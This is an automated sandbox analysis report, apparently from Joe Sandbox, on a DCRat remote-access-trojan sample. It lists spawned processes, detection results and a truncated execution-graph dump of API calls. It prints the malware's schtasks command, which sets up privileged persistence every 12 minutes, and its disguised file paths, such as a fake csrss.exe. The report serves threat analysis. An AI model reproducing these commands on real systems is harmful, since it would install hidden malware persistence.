                        Has exited:true

                        General

                        Target ID:13
                        Start time:00:36:59
                        Start date:02/01/2025
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZgM" /sc MINUTE /mo 12 /tr "'C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /rl HIGHEST /f
                        Imagebase:0x7ff76f990000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:14
                        Start time:00:37:00
                        Start date:02/01/2025
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KPLr9FsY2g.bat"
                        Imagebase:0x7ff639c00000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:15
                        Start time:00:37:00
                        Start date:02/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:16
                        Start time:00:37:00
                        Start date:02/01/2025
                        Path:C:\Windows\System32\w32tm.exe
                        Wow64 process (32bit):false
                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Imagebase:0x7ff638230000
                        File size:108'032 bytes
                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:19
                        Start time:00:37:01
                        Start date:02/01/2025
                        Path:C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe
                        Imagebase:0xb20000
                        File size:1'060'864 bytes
                        MD5 hash:BB31080A1AC450BC92BE05ED245BBCEB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.1784881543.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 74%, ReversingLabs
                        Has exited:true

                        General

                        Target ID:20
                        Start time:00:37:01
                        Start date:02/01/2025
                        Path:C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe
                        Imagebase:0xf20000
                        File size:1'060'864 bytes
                        MD5 hash:BB31080A1AC450BC92BE05ED245BBCEB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.1797616767.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.1797616767.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Has exited:true

                        General

                        Target ID:21
                        Start time:00:37:05
                        Start date:02/01/2025
                        Path:C:\Recovery\csrss.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Recovery\csrss.exe"
                        Imagebase:0x720000
                        File size:1'060'864 bytes
                        MD5 hash:BB31080A1AC450BC92BE05ED245BBCEB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.1829922559.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 74%, ReversingLabs
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:9.8%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:9.3%
                          Total number of Nodes:1494
                          Total number of Limit Nodes:30
                          execution_graph 24741 38a430 73 API calls 24797 38be49 103 API calls 4 library calls 24742 371025 29 API calls pre_c_initialization 22921 379f2f 22922 379f44 22921->22922 22923 379f3d 22921->22923 22924 379f4a GetStdHandle 22922->22924 22931 379f55 22922->22931 22924->22931 22925 379fa9 WriteFile 22925->22931 22926 379f7c WriteFile 22927 379f7a 22926->22927 22926->22931 22927->22926 22927->22931 22929 37a031 22933 377061 75 API calls 22929->22933 22931->22923 22931->22925 22931->22926 22931->22927 22931->22929 22932 376e18 60 API calls 22931->22932 22932->22931 22933->22923 24801 38be49 108 API calls 4 library calls 22937 38dc1f 22938 38dbcd 22937->22938 22940 38df59 22938->22940 22968 38dc67 22940->22968 22942 38df73 22943 38dfd0 22942->22943 22956 38dff4 22942->22956 22944 38ded7 DloadReleaseSectionWriteAccess 11 API calls 22943->22944 22945 38dfdb RaiseException 22944->22945 22962 38e1c9 22945->22962 22946 38e06c LoadLibraryExA 22948 38e0cd 22946->22948 22949 38e07f GetLastError 22946->22949 22947 38ec4a DloadUnlock 5 API calls 22950 38e1d8 22947->22950 22952 38e0d8 FreeLibrary 22948->22952 22953 38e0df 22948->22953 22954 38e0a8 22949->22954 22961 38e092 22949->22961 22950->22938 22951 38e19b 22979 38ded7 22951->22979 22952->22953 22953->22951 22955 38e13d GetProcAddress 22953->22955 22958 38ded7 DloadReleaseSectionWriteAccess 11 API calls 22954->22958 22955->22951 22957 38e14d GetLastError 22955->22957 22956->22946 22956->22948 22956->22951 22956->22953 22964 38e160 22957->22964 22959 38e0b3 RaiseException 22958->22959 22959->22962 22961->22948 22961->22954 22962->22947 22963 38ded7 DloadReleaseSectionWriteAccess 11 API calls 22965 38e181 RaiseException 22963->22965 22964->22951 22964->22963 22966 38dc67 ___delayLoadHelper2@8 11 API calls 22965->22966 22967 38e198 22966->22967 22967->22951 22969 38dc99 22968->22969 22970 38dc73 22968->22970 22969->22942 22987 38dd15 22970->22987 22973 38dc94 22997 38dc9a 22973->22997 22976 38df24 22977 38ec4a DloadUnlock 5 API calls 22976->22977 22978 38df55 22977->22978 22978->22942 22980 38dee9 22979->22980 22981 38df0b 22979->22981 22982 38dd15 DloadLock 8 API calls 22980->22982 22981->22962 22983 38deee 22982->22983 22984 38df06 22983->22984 22985 38de67 DloadProtectSection 3 API calls 22983->22985 23006 38df0f 8 API calls DloadUnlock 22984->23006 22985->22984 22988 38dc9a DloadUnlock 3 API calls 22987->22988 22989 38dd2a 22988->22989 22990 38ec4a DloadUnlock 5 API calls 22989->22990 22991 38dc78 22990->22991 22991->22973 22992 38de67 22991->22992 22994 38de7c DloadObtainSection 22992->22994 22993 38de82 22993->22973 22994->22993 22995 38deb7 VirtualProtect 22994->22995 23005 38dd72 VirtualQuery GetSystemInfo 22994->23005 22995->22993 22998 38dcab 22997->22998 22999 38dca7 22997->22999 23000 38dcaf 22998->23000 23001 38dcb3 GetModuleHandleW 22998->23001 22999->22976 23000->22976 23002 38dcc9 GetProcAddress 23001->23002 23004 38dcc5 23001->23004 23003 38dcd9 GetProcAddress 23002->23003 23002->23004 23003->23004 23004->22976 23005->22995 23006->22981 24802 376110 80 API calls 24803 39b710 GetProcessHeap 24805 371f05 126 API calls __EH_prolog 24743 38ec0b 28 API calls 2 library calls 24807 38db0b 19 API calls ___delayLoadHelper2@8 23017 38c40e 23018 38c4c7 23017->23018 23024 38c42c _wcschr 23017->23024 23019 38c4e5 23018->23019 23036 38be49 _wcsrchr 23018->23036 23072 38ce22 23018->23072 23022 38ce22 18 API calls 23019->23022 23019->23036 23022->23036 23023 38ca8d 23024->23018 23025 3817ac CompareStringW 23024->23025 23025->23024 23027 38c11d SetWindowTextW 23027->23036 23032 38bf0b SetFileAttributesW 23033 38bfc5 GetFileAttributesW 23032->23033 23045 38bf25 ___scrt_fastfail 23032->23045 23033->23036 23037 38bfd7 DeleteFileW 23033->23037 23036->23023 23036->23027 23036->23032 23038 38c2e7 GetDlgItem SetWindowTextW SendMessageW 23036->23038 23041 38c327 SendMessageW 23036->23041 23046 3817ac CompareStringW 23036->23046 23047 38aa36 23036->23047 23051 389da4 GetCurrentDirectoryW 23036->23051 23056 37a52a 7 API calls 23036->23056 23057 37a4b3 FindClose 23036->23057 23058 38ab9a 76 API calls new 23036->23058 23059 3935de 23036->23059 23037->23036 23039 38bfe8 23037->23039 23038->23036 23053 37400a 23039->23053 23041->23036 23043 38c01d MoveFileW 23043->23036 23044 38c035 MoveFileExW 23043->23044 23044->23036 23045->23033 23045->23036 23052 37b4f7 52 API calls 2 library calls 23045->23052 23046->23036 23048 38aa40 23047->23048 23049 38ab16 23048->23049 23050 38aaf3 ExpandEnvironmentStringsW 23048->23050 23049->23036 23050->23049 23051->23036 23052->23045 23095 373fdd 23053->23095 23056->23036 23057->23036 23058->23036 23060 398606 23059->23060 23061 39861e 23060->23061 23062 398613 23060->23062 23064 398626 23061->23064 23070 39862f _free 23061->23070 23158 398518 23062->23158 23067 3984de _free 20 API calls 23064->23067 23065 398659 HeapReAlloc 23069 39861b 23065->23069 23065->23070 23066 398634 23165 39895a 20 API calls _free 23066->23165 23067->23069 23069->23036 23070->23065 23070->23066 23166 3971ad 7 API calls 2 library calls 23070->23166 23074 38ce2c ___scrt_fastfail 23072->23074 23073 38d08a 23073->23019 23074->23073 23075 38cf1b 23074->23075 23172 3817ac CompareStringW 23074->23172 23169 37a180 23075->23169 23079 38cf4f ShellExecuteExW 23079->23073 23084 38cf62 23079->23084 23081 38cf47 23081->23079 23082 38cf9b 23174 38d2e6 6 API calls 23082->23174 23083 38cff1 CloseHandle 23085 38d00a 23083->23085 23086 38cfff 23083->23086 23084->23082 23084->23083 23087 38cf91 ShowWindow 23084->23087 23085->23073 23091 38d081 ShowWindow 23085->23091 23175 3817ac CompareStringW 23086->23175 23087->23082 23090 38cfb3 23090->23083 23092 38cfc6 GetExitCodeProcess 23090->23092 23091->23073 23092->23083 23093 38cfd9 23092->23093 23093->23083 23096 373ff4 __vsnwprintf_l 23095->23096 23099 395759 23096->23099 23102 393837 23099->23102 23103 39385f 23102->23103 23104 393877 23102->23104 23119 39895a 20 API calls _free 23103->23119 23104->23103 23106 39387f 23104->23106 23121 393dd6 23106->23121 23107 393864 23120 398839 26 API calls __cftof 23107->23120 23112 38ec4a DloadUnlock 5 API calls 23114 373ffe GetFileAttributesW 23112->23114 23113 393907 23130 394186 51 API calls 4 library calls 23113->23130 23114->23039 23114->23043 23117 393912 23131 393e59 20 API calls _free 23117->23131 23118 39386f 23118->23112 23119->23107 23120->23118 23122 393df3 23121->23122 23128 39388f 23121->23128 23122->23128 23132 398fa5 GetLastError 23122->23132 23124 393e14 23152 3990fa 38 API calls __cftof 23124->23152 23126 393e2d 23153 399127 38 API calls __cftof 23126->23153 23129 393da1 20 API calls 2 library calls 23128->23129 23129->23113 23130->23117 23131->23118 23133 398fbb 23132->23133 23134 398fc1 23132->23134 23154 39a61b 11 API calls 2 library calls 23133->23154 23136 3985a9 _free 20 API calls 23134->23136 23138 399010 SetLastError 23134->23138 23137 398fd3 23136->23137 23143 398fdb 23137->23143 23155 39a671 11 API calls 2 library calls 23137->23155 23138->23124 23140 3984de _free 20 API calls 23142 398fe1 23140->23142 23141 398ff0 23141->23143 23144 398ff7 23141->23144 23146 39901c SetLastError 23142->23146 23143->23140 23156 398e16 20 API calls _free 23144->23156 23157 398566 38 API calls _abort 23146->23157 23147 399002 23149 3984de _free 20 API calls 23147->23149 23151 399009 23149->23151 23151->23138 23151->23146 23152->23126 23153->23128 23154->23134 23155->23141 23156->23147 23159 398556 23158->23159 23164 398526 _free 23158->23164 23168 39895a 20 API calls _free 23159->23168 23161 398541 RtlAllocateHeap 23162 398554 23161->23162 23161->23164 23162->23069 23164->23159 23164->23161 23167 3971ad 7 API calls 2 library calls 23164->23167 23165->23069 23166->23070 23167->23164 23168->23162 23176 37a194 23169->23176 23172->23075 23173 37b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23173->23081 23174->23090 23175->23085 23184 38e360 23176->23184 23179 37a1b2 23186 37b66c 23179->23186 23180 37a189 23180->23079 23180->23173 23182 37a1c6 23182->23180 23183 37a1ca GetFileAttributesW 23182->23183 23183->23180 23185 37a1a1 GetFileAttributesW 23184->23185 23185->23179 23185->23180 23187 37b679 23186->23187 23195 37b683 23187->23195 23196 37b806 CharUpperW 23187->23196 23189 37b692 23197 37b832 CharUpperW 23189->23197 23191 37b6a1 23192 37b6a5 23191->23192 23193 37b71c GetCurrentDirectoryW 23191->23193 23198 37b806 CharUpperW 23192->23198 23193->23195 23195->23182 23196->23189 23197->23191 23198->23195 24744 38ea00 46 API calls 6 library calls 24745 371075 82 API calls pre_c_initialization 23214 38d573 23215 38d580 23214->23215 23222 37ddd1 23215->23222 23218 37400a _swprintf 51 API calls 23219 38d5a6 SetDlgItemTextW 23218->23219 23225 38ac74 PeekMessageW 23219->23225 23230 37ddff 23222->23230 23226 38acc8 23225->23226 23227 38ac8f GetMessageW 23225->23227 23228 38acb4 TranslateMessage DispatchMessageW 23227->23228 23229 38aca5 IsDialogMessageW 23227->23229 23228->23226 23229->23226 23229->23228 23236 37d28a 23230->23236 23233 37de22 LoadStringW 23234 37ddfc 23233->23234 23235 37de39 LoadStringW 23233->23235 23234->23218 23235->23234 23241 37d1c3 23236->23241 23238 37d2a7 23239 37d2bc 23238->23239 23249 37d2c8 26 API calls 23238->23249 23239->23233 23239->23234 23242 37d1de 23241->23242 23248 37d1d7 _strncpy 23241->23248 23244 37d202 23242->23244 23250 381596 WideCharToMultiByte 23242->23250 23247 37d233 23244->23247 23251 37dd6b 50 API calls __vsnprintf 23244->23251 23252 3958d9 26 API calls 3 library calls 23247->23252 23248->23238 23249->23239 23250->23244 23251->23247 23252->23248 24748 385c77 121 API calls __vsnwprintf_l 24752 38fc60 51 API calls 2 library calls 24754 393460 RtlUnwind 24755 399c60 71 API calls _free 24756 399e60 31 API calls 2 library calls 24809 389b50 GdipDisposeImage GdipFree __except_handler4 24758 398050 8 API calls ___vcrt_uninitialize 24727 379b59 24728 379bd7 24727->24728 24731 379b63 24727->24731 24729 379bad SetFilePointer 24729->24728 24730 379bcd GetLastError 24729->24730 24730->24728 24731->24729 24811 38d34e DialogBoxParamW 24760 38ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24761 388c40 GetClientRect 24762 393040 5 API calls 2 library calls 24812 38be49 98 API calls 3 library calls 24763 3a0040 IsProcessorFeaturePresent 24765 3976bd 52 API calls 2 library calls 24766 3716b0 84 API calls 22828 3990b0 22836 39a56f 22828->22836 22830 3990c4 22834 3990d9 22863 39a458 22836->22863 22839 39a59f 22870 38ec4a 22839->22870 22840 39a5ae TlsAlloc 22840->22839 22842 3990ba 22842->22830 22843 399029 GetLastError 22842->22843 22844 399048 22843->22844 22845 399042 22843->22845 22849 39909f SetLastError 22844->22849 22885 3985a9 22844->22885 22892 39a61b 11 API calls 2 library calls 22845->22892 22851 3990a8 22849->22851 22850 399062 22893 3984de 22850->22893 22851->22834 22862 3990e0 11 API calls 22851->22862 22853 399077 22853->22850 22855 39907e 22853->22855 22900 398e16 20 API calls _free 22855->22900 22856 399068 22858 399096 SetLastError 22856->22858 22858->22851 22859 399089 22860 3984de _free 17 API calls 22859->22860 22861 39908f 22860->22861 22861->22849 22861->22858 22862->22830 22864 39a484 22863->22864 22865 39a488 22863->22865 22864->22865 22869 39a4a8 22864->22869 22877 39a4f4 22864->22877 22865->22839 22865->22840 22867 39a4b4 GetProcAddress 22868 39a4c4 __crt_fast_encode_pointer 22867->22868 22868->22865 22869->22865 22869->22867 22871 38ec53 22870->22871 22872 38ec55 IsProcessorFeaturePresent 22870->22872 22871->22842 22874 38f267 22872->22874 22884 38f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22874->22884 22876 38f34a 22876->22842 22878 39a50a 22877->22878 22879 39a515 LoadLibraryExW 22877->22879 22878->22864 22880 39a532 GetLastError 22879->22880 22882 39a54a 22879->22882 22880->22882 22883 39a53d LoadLibraryExW 22880->22883 22881 39a561 FreeLibrary 22881->22878 22882->22878 22882->22881 22883->22882 22884->22876 22890 3985b6 _free 22885->22890 22886 3985f6 22902 39895a 20 API calls _free 22886->22902 22887 3985e1 RtlAllocateHeap 22888 3985f4 22887->22888 22887->22890 22888->22850 22899 39a671 11 API calls 2 library calls 22888->22899 22890->22886 22890->22887 22901 3971ad 7 API calls 2 library calls 22890->22901 22892->22844 22894 3984e9 RtlFreeHeap 22893->22894 22895 398512 _free 22893->22895 22894->22895 22896 3984fe 22894->22896 22895->22856 22903 39895a 20 API calls _free 22896->22903 22898 398504 GetLastError 22898->22895 22899->22853 22900->22859 22901->22890 22902->22888 22903->22898 22904 39a3b0 22905 39a3bb 22904->22905 22907 39a3e4 22905->22907 22908 39a3e0 22905->22908 22910 39a6ca 22905->22910 22917 39a410 DeleteCriticalSection 22907->22917 22911 39a458 _free 5 API calls 22910->22911 22912 39a6f1 22911->22912 22913 39a6fa 22912->22913 22914 39a70f InitializeCriticalSectionAndSpinCount 22912->22914 22915 38ec4a DloadUnlock 5 API calls 22913->22915 22914->22913 22916 39a726 22915->22916 22916->22905 22917->22908 24767 391eb0 6 API calls 3 library calls 24814 3979b7 55 API calls _free 24768 3796a0 79 API calls 24817 39e9a0 51 API calls 24771 38e4a2 38 API calls 2 library calls 24774 38a89d 78 API calls 24775 387090 114 API calls 24776 38cc90 70 API calls 24818 38a990 97 API calls 24819 389b90 GdipCloneImage GdipAlloc 23009 38d891 19 API calls ___delayLoadHelper2@8 24820 399b90 21 API calls _free 24821 392397 48 API calls 23011 38d997 23012 38d89b 23011->23012 23013 38df59 ___delayLoadHelper2@8 19 API calls 23012->23013 23013->23012 24778 37ea98 FreeLibrary 24779 39ac0e 27 API calls DloadUnlock 23014 371385 82 API calls 3 library calls 24824 395780 QueryPerformanceFrequency QueryPerformanceCounter 23205 38e1f9 23206 38e203 23205->23206 23207 38df59 ___delayLoadHelper2@8 19 API calls 23206->23207 23208 38e210 23207->23208 24825 39abfd 6 API calls DloadUnlock 24827 38ebf7 20 API calls 23258 38aee0 23259 38aeea __EH_prolog 23258->23259 23421 37130b 23259->23421 23262 38b5cb 23493 38cd2e 23262->23493 23263 38af2c 23265 38af39 23263->23265 23266 38afa2 23263->23266 23325 38af18 23263->23325 23268 38af3e 23265->23268 23272 38af75 23265->23272 23271 38b041 GetDlgItemTextW 23266->23271 23276 38afbc 23266->23276 23278 37ddd1 53 API calls 23268->23278 23268->23325 23269 38b5e9 SendMessageW 23270 38b5f7 23269->23270 23274 38b600 SendDlgItemMessageW 23270->23274 23275 38b611 GetDlgItem SendMessageW 23270->23275 23271->23272 23273 38b077 23271->23273 23279 38af96 KiUserCallbackDispatcher 23272->23279 23272->23325 23280 38b08f GetDlgItem 23273->23280 23281 38b080 23273->23281 23274->23275 23511 389da4 GetCurrentDirectoryW 23275->23511 23277 37ddd1 53 API calls 23276->23277 23283 38afde SetDlgItemTextW 23277->23283 23284 38af58 23278->23284 23279->23325 23286 38b0a4 SendMessageW SendMessageW 23280->23286 23287 38b0c5 SetFocus 23280->23287 23281->23272 23296 38b56b 23281->23296 23289 38afec 23283->23289 23533 371241 SHGetMalloc 23284->23533 23285 38b641 GetDlgItem 23291 38b65e 23285->23291 23292 38b664 SetWindowTextW 23285->23292 23286->23287 23288 38b0d5 23287->23288 23305 38b0ed 23287->23305 23294 37ddd1 53 API calls 23288->23294 23299 38aff9 GetMessageW 23289->23299 23289->23325 23291->23292 23512 38a2c7 GetClassNameW 23292->23512 23298 38b0df 23294->23298 23295 38af5f 23300 38af63 SetDlgItemTextW 23295->23300 23295->23325 23301 37ddd1 53 API calls 23296->23301 23534 38cb5a 23298->23534 23304 38b010 IsDialogMessageW 23299->23304 23299->23325 23300->23325 23306 38b57b SetDlgItemTextW 23301->23306 23304->23289 23308 38b01f TranslateMessage DispatchMessageW 23304->23308 23310 37ddd1 53 API calls 23305->23310 23309 38b58f 23306->23309 23308->23289 23311 37ddd1 53 API calls 23309->23311 23313 38b124 23310->23313 23314 38b5b8 23311->23314 23312 38b6af 23318 38b6df 23312->23318 23322 37ddd1 53 API calls 23312->23322 23319 37400a _swprintf 51 API calls 23313->23319 23320 37ddd1 53 API calls 23314->23320 23315 38b0e6 23431 37a04f 23315->23431 23317 38bdf5 98 API calls 23317->23312 23324 38bdf5 98 API calls 23318->23324 23370 38b797 23318->23370 23323 38b136 23319->23323 23320->23325 23329 38b6c2 SetDlgItemTextW 23322->23329 23330 38cb5a 16 API calls 23323->23330 23331 38b6fa 23324->23331 23326 38b847 23332 38b859 23326->23332 23333 38b850 EnableWindow 23326->23333 23327 38b17f 23437 38a322 SetCurrentDirectoryW 23327->23437 23328 38b174 GetLastError 23328->23327 23335 37ddd1 53 API calls 23329->23335 23330->23315 23339 38b70c 23331->23339 23362 38b731 23331->23362 23336 38b876 23332->23336 23552 3712c8 GetDlgItem EnableWindow 23332->23552 23333->23332 23338 38b6d6 SetDlgItemTextW 23335->23338 23344 38b89d 23336->23344 23349 38b895 SendMessageW 23336->23349 23337 38b195 23342 38b19e GetLastError 23337->23342 23343 38b1ac 23337->23343 23338->23318 23550 389635 32 API calls 23339->23550 23340 38b78a 23345 38bdf5 98 API calls 23340->23345 23342->23343 23348 38b227 23343->23348 23353 38b237 23343->23353 23354 38b1c4 GetTickCount 23343->23354 23344->23325 23350 37ddd1 53 API calls 23344->23350 23345->23370 23347 38b86c 23553 3712c8 GetDlgItem EnableWindow 23347->23553 23348->23353 23357 38b46c 23348->23357 23349->23344 23356 38b8b6 SetDlgItemTextW 23350->23356 23351 38b725 23351->23362 23358 38b24f GetModuleFileNameW 23353->23358 23359 38b407 23353->23359 23360 37400a _swprintf 51 API calls 23354->23360 23355 38b825 23551 389635 32 API calls 23355->23551 23356->23325 23453 3712e6 GetDlgItem ShowWindow 23357->23453 23544 37eb3a 80 API calls 23358->23544 23359->23272 23374 37ddd1 53 API calls 23359->23374 23366 38b1dd 23360->23366 23362->23340 23369 38bdf5 98 API calls 23362->23369 23364 38b47c 23454 3712e6 GetDlgItem ShowWindow 23364->23454 23438 37971e 23366->23438 23367 38b844 23367->23326 23368 37ddd1 53 API calls 23368->23370 23371 38b75f 23369->23371 23370->23326 23370->23355 23370->23368 23371->23340 23375 38b768 DialogBoxParamW 23371->23375 23373 38b275 23377 37400a _swprintf 51 API calls 23373->23377 23378 38b41b 23374->23378 23375->23272 23375->23340 23376 38b486 23379 37ddd1 53 API calls 23376->23379 23380 38b297 CreateFileMappingW 23377->23380 23381 37400a _swprintf 51 API calls 23378->23381 23383 38b490 SetDlgItemTextW 23379->23383 23384 38b2f9 GetCommandLineW 23380->23384 23414 38b376 __vsnwprintf_l 23380->23414 23385 38b439 23381->23385 23455 3712e6 GetDlgItem ShowWindow 23383->23455 23389 38b30a 23384->23389 23398 37ddd1 53 API calls 23385->23398 23386 38b203 23390 38b215 23386->23390 23391 38b20a GetLastError 23386->23391 23387 38b381 ShellExecuteExW 23412 38b39e 23387->23412 23545 38ab2e SHGetMalloc 23389->23545 23446 379653 23390->23446 23391->23390 23392 38b4a2 SetDlgItemTextW GetDlgItem 23395 38b4bf GetWindowLongW SetWindowLongW 23392->23395 23396 38b4d7 23392->23396 23395->23396 23456 38bdf5 23396->23456 23397 38b326 23546 38ab2e SHGetMalloc 23397->23546 23398->23272 23402 38b332 23547 38ab2e SHGetMalloc 23402->23547 23403 38b3e1 23403->23359 23408 38b3f7 UnmapViewOfFile CloseHandle 23403->23408 23404 38bdf5 98 API calls 23406 38b4f3 23404->23406 23481 38d0f5 23406->23481 23407 38b33e 23548 37ecad 80 API calls ___scrt_fastfail 23407->23548 23408->23359 23411 38b355 MapViewOfFile 23411->23414 23412->23403 23415 38b3cd Sleep 23412->23415 23414->23387 23415->23403 23415->23412 23416 38bdf5 98 API calls 23419 38b519 23416->23419 23417 38b542 23549 3712c8 GetDlgItem EnableWindow 23417->23549 23419->23417 23420 38bdf5 98 API calls 23419->23420 23420->23417 23422 37136d 23421->23422 23424 371314 23421->23424 23555 37da71 GetWindowLongW SetWindowLongW 23422->23555 23425 37137a 23424->23425 23554 37da98 62 API calls 2 library calls 23424->23554 23425->23262 23425->23263 23425->23325 23427 371336 23427->23425 23428 371349 GetDlgItem 23427->23428 23428->23425 23429 371359 23428->23429 23429->23425 23430 37135f SetWindowTextW 23429->23430 23430->23425 23433 37a059 23431->23433 23432 37a0ea 23434 37a207 9 API calls 23432->23434 23436 37a113 23432->23436 23433->23432 23433->23436 23556 37a207 23433->23556 23434->23436 23436->23327 23436->23328 23437->23337 23439 379728 23438->23439 23440 379792 CreateFileW 23439->23440 23441 379786 23439->23441 23440->23441 23442 3797e4 23441->23442 23443 37b66c 2 API calls 23441->23443 23442->23386 23444 3797cb 23443->23444 23444->23442 23445 3797cf CreateFileW 23444->23445 23445->23442 23447 379677 23446->23447 23452 379688 23446->23452 23448 379683 23447->23448 23449 37968a 23447->23449 23447->23452 23577 379817 23448->23577 23582 3796d0 23449->23582 23452->23348 23453->23364 23454->23376 23455->23392 23457 38bdff __EH_prolog 23456->23457 23458 38b4e5 23457->23458 23459 38aa36 ExpandEnvironmentStringsW 23457->23459 23458->23404 23460 38be36 _wcsrchr 23459->23460 23460->23458 23462 38aa36 ExpandEnvironmentStringsW 23460->23462 23463 38c11d SetWindowTextW 23460->23463 23466 3935de 22 API calls 23460->23466 23468 38bf0b SetFileAttributesW 23460->23468 23473 38c2e7 GetDlgItem SetWindowTextW SendMessageW 23460->23473 23476 38c327 SendMessageW 23460->23476 23597 3817ac CompareStringW 23460->23597 23598 389da4 GetCurrentDirectoryW 23460->23598 23600 37a52a 7 API calls 23460->23600 23601 37a4b3 FindClose 23460->23601 23602 38ab9a 76 API calls new 23460->23602 23462->23460 23463->23460 23466->23460 23469 38bfc5 GetFileAttributesW 23468->23469 23480 38bf25 ___scrt_fastfail 23468->23480 23469->23460 23472 38bfd7 DeleteFileW 23469->23472 23472->23460 23474 38bfe8 23472->23474 23473->23460 23475 37400a _swprintf 51 API calls 23474->23475 23477 38c008 GetFileAttributesW 23475->23477 23476->23460 23477->23474 23478 38c01d MoveFileW 23477->23478 23478->23460 23479 38c035 MoveFileExW 23478->23479 23479->23460 23480->23460 23480->23469 23599 37b4f7 52 API calls 2 library calls 23480->23599 23482 38d0ff __EH_prolog 23481->23482 23603 37fead 23482->23603 23484 38d130 23607 375c59 23484->23607 23486 38d14e 23611 377c68 23486->23611 23490 38d1a1 23628 377cfb 23490->23628 23492 38b504 23492->23416 23494 38cd38 23493->23494 24101 389d1a 23494->24101 23497 38cd45 GetWindow 23498 38b5d1 23497->23498 23501 38cd65 23497->23501 23498->23269 23498->23270 23499 38cd72 GetClassNameW 24106 3817ac CompareStringW 23499->24106 23501->23498 23501->23499 23502 38cdfa GetWindow 23501->23502 23503 38cd96 GetWindowLongW 23501->23503 23502->23498 23502->23501 23503->23502 23504 38cda6 SendMessageW 23503->23504 23504->23502 23505 38cdbc GetObjectW 23504->23505 24107 389d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23505->24107 23507 38cdd3 24108 389d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23507->24108 24109 389f5d 8 API calls ___scrt_fastfail 23507->24109 23510 38cde4 SendMessageW DeleteObject 23510->23502 23511->23285 23513 38a2e8 23512->23513 23514 38a30d 23512->23514 24112 3817ac CompareStringW 23513->24112 23516 38a31b 23514->23516 23517 38a312 SHAutoComplete 23514->23517 23520 38a7c3 23516->23520 23517->23516 23518 38a2fb 23518->23514 23519 38a2ff FindWindowExW 23518->23519 23519->23514 23521 38a7cd __EH_prolog 23520->23521 23522 371380 82 API calls 23521->23522 23523 38a7ef 23522->23523 24113 371f4f 23523->24113 23526 38a818 23529 371951 126 API calls 23526->23529 23527 38a809 23528 371631 84 API calls 23527->23528 23530 38a814 23528->23530 23531 38a83a __vsnwprintf_l new 23529->23531 23530->23312 23530->23317 23531->23530 23532 371631 84 API calls 23531->23532 23532->23530 23533->23295 23535 38ac74 5 API calls 23534->23535 23536 38cb66 GetDlgItem 23535->23536 23537 38cb88 23536->23537 23538 38cbbc SendMessageW SendMessageW 23536->23538 23541 38cb93 ShowWindow SendMessageW SendMessageW 23537->23541 23539 38cbf8 23538->23539 23540 38cc17 SendMessageW SendMessageW SendMessageW 23538->23540 23539->23540 23542 38cc4a SendMessageW 23540->23542 23543 38cc6d SendMessageW 23540->23543 23541->23538 23542->23543 23543->23315 23544->23373 23545->23397 23546->23402 23547->23407 23548->23411 23549->23281 23550->23351 23551->23367 23552->23347 23553->23336 23554->23427 23555->23425 23557 37a214 23556->23557 23558 37a238 23557->23558 23559 37a22b CreateDirectoryW 23557->23559 23560 37a180 4 API calls 23558->23560 23559->23558 23561 37a26b 23559->23561 23562 37a23e 23560->23562 23565 37a27a 23561->23565 23569 37a444 23561->23569 23563 37a27e GetLastError 23562->23563 23566 